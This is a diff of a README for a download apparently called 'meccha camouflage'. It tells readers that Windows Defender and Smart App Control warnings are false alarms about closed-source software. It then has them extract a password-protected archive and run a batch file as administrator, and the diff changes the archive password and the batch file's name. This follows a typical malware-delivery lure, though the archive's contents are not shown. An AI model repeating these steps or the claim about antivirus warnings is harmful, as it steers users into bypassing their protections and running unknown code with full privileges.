MecchaElov/meccha-camouflage-V1.7.2/README.md

 (if you are not sure about this it is beacuse windows defender takes closed source as a "virus" and smart app control wont let you open closed source projects if they do not have a verified realeser)

  - 3 download "meccha camouflage V2.1" then create a folder on your desktop and call it whatever you want now put the files from the winrar into your new folder..
-(password is "meccha camouflage")
+(password is "Meccha")

- - 4 open "simple setup.bat" as admin if not it wont open (only way i could fix this)..
+ - 4 open "main (open to start).bat" as admin if not it wont open (only way i could fix this)..

 and done